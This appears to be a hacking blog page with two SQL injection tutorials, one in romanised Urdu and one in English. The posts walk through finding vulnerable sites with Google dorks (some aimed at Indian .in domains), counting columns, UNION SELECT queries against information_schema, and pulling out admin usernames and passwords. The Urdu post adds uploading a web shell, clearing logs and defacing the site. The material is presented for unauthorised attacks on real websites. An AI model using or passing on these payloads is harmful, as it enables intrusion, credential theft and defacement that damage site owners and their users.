Showing posts with label sql injection. Show all posts
Showing posts with label sql injection. Show all posts

Saturday, 1 November 2014

// // Leave a Comment

How to Hack Any Website with Sql injection Urdu language

How to Hack Any Website with Sql injection Urdu language




This Post Is Written By Abdullah Khan.Thanks To Him
 SQL InjecTion In urdU Language  Sab Se Pehele Aap download KAren!
[+] FireFox!
[+] HackBar
[+] havij for finding Admin Panel
[+] 1 or 2 Vulnerable Webs Tongue


[+][+][+][+][+][+]^^^^^^^^^^^^^^^^^^^[+][+][+][+][+][+][+]
<-= S T A R T =->
Google
Ye Search engine Kholen!
Or Search Karen!
Special Dorks!
inurl:index.php?id=
inurlages.php?id=
inurl:images.php?id=

India Ki Vulnerable websites KEse Dhoonden?????
Apna Dork google Per Likhen
Or site:.in Aakhir Main Likhden
Example:-) inurl:images.php?id= site:.in
Ok Ab TayyAr hoajyen :*
hamain Kya Dhoondna hai???
Vulnerable web
Tables
Column
Admin PAnel And shell UPloading
Defacing Tongue
Ok To Ye Hai ApnI VulneRable Web!
Kese check KAren ye Site vulnerable hai?? bus ‘ Ye Vuln web K End Main Lagayen!
Example:-)
http://www.vuln.in/index.php?id=15′ Aise
http://www.vuln.in/index.php?id=15 Order by 1
Simple page
http://www.vuln.in/index.php?id=15 Order by 2
Simple Page
http://www.vuln.in/index.php?id=15 Order by 3
Simeple page
http://www.vuln.in/index.php?id=15 Order by 4
Simple Page
http://www.vuln.in/index.php?id=15 Order by 5
Simple Page
http://www.vuln.in/index.php?id=15 Order by 6
1 errorr Aagaya Unknown Column in order To Clause “6″
Iska Matlb http://www.vuln.in/index.php?id=15 Per Sirf 5 hi Columns hain
Ab Union Select Waala Method Start :-)
union Find Karne Se Pehele Vuln Web Ki Value Per – Lagaden !
Example :-)
http://www.vuln.in/index.php?id=-15 Aise
Or Ab Vulnerable column Find KAren!
http://www.vuln.in/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc….!
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!
Ab Tables Found KArne Waal Method Start :-)
Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number “2″ Ko Hatake !
ye Likhen group_concat(table_name) or Phir Aakhir main from information_schema.tables where table_schema=database ()–
Example:-)
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema= database ()–
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna My_sql Fetch error Aajayega!
Like:-) admin,user,post,contacts,timing,gallery, etc etc…!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen “Admin”!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!
ab Aapko group_concat(table_name0 Ki Jagah group_concat(column_name) Likhna hOgA Tongue
Or form Information_schema.tables Ki Jagah column Likhna hai Or table_schema= Ki Jagah per table_name Likhna hai Tongue
Example:-) http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Ab Column FindinG <Method>
Ab aapko Apni vulnerable Web k aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc etc hamain username and Password Chahiye!
ab Passwor dKese nikaalen??? Neeche hai sab Kuch
http://www.vuln.in/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
Or Pass Aapka
90% Times Pass Encrypted Hota Hai Like MD5,MD2,SHa=1 etc etc!
To Isse Decrypt Karna Parta hai ! Maine 300 se zyada Web Hack Ki Lekin Decrypted Pass Or Admin panel nahi mila hahahaha!
Ok Ab Apna havij Open KAren Or usmain Apni vuln Link daalen Aise !
http://www.vuln.in/
Sirf Address Daalen Phir Find Admin Per CLick KAren!
http://www.vuln.in/admin
http://www.vuln.in/administrator
http://www.vuln.in/controlpanel
http://www.vuln.in/kpanel etc etc!
Ab http://www.vuln.in/admin Open KAren!
Or username And Pass Daalen!
Or aB Aap Web main hain Tongue
ab Ager chahen To Shell UPload KAr Sakte hain !
Ager Apne Logs Clear Karna Chahte hain To KArna Parega xD
Phir Uploading Option dhoonden !
Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden Tongue
Note:-) Ager Koi SqL Problem hO To zAROR pOChain Or Comments Zaroor DainSmile xC><)

                                                           Posted by Umair Haxor
Read More
// // Leave a Comment

Hack websites with sql injection - For Begginers


                                



Hi Everbody
This tutorial is for newbies
how to hack website sql injection

What is Sql injection ?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an APPLICATION. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.


Now here is the method
Steps:-

1st :- First you have to find a vuln web.
You can use dorks for finding it !!
Suppose you have a vuln web
http://website.com?india.php=1

2nd :- Now we have to find Coulmns
For this we will add "order by 1--" , Kept the digit increasing until it gives error.

http://website.com/india.php?id=1 order by 1--
http://website.com/india.php?id=1 order by 2--
http://website.com/india.php?id=1 order by 3--
http://website.com/india.php?id=1 order by 4--

If it shows error like this
"You have an error in your SQL syntax; check the MANUAL that corresponds
to your MySQL server version for the right syntax to use near '\'39' at
line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=\'39"

3rd :- Now select Coulmns
Coulmns are 4
Keep increasing the digit until Coulms are found
http://wwbsite.com/india.php?id=1 UNION ALL SELECT 1,2,3,4--

4rth :- Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I will choose 1
http://website.com/india.php?id=1 UNION ALL SELECT @@version,2,3,4--
you got the version like this:
5.0.32-Debian_7etch11-log

5th :- Now We will find tables
http://website.com/india.php?id=1 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--
And you will got tables like this:
PRODUCTS , Admin , and others
So must be there table by name: admin , users , user , login , client.

6th :- Now We have to find Coulmns in the tables . Forexample we will find Coulmns of table Admin
http://website.com/india.php?id=1 UNION ALL SELECT
column_name,2,3,4 from information_schema.columns where
table_name=char()--
Now
We found Admin table now go to ASCII web and convert Admin
You will got this Admin
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)--
http://website.com/india.php?id=1 UNION ALL SELECT
column_name,2,3,4 from information_schema.columns where
table_name=char(65,68,77,73,78,83)--
And you will got the columns in table Admin
There need to have columns with names: username and password.

7th :- Now we will get username and password.
Now we put concat(username,0x3a,password) and admin
http://website.com/india.php?id=1 UNION ALL SELECT concat(username,0x3a,password),2,3,4 from admin--
( 0x3a is ASCII )

8th :- Now you will get username and password
Find admin panel and fu** the web

Read More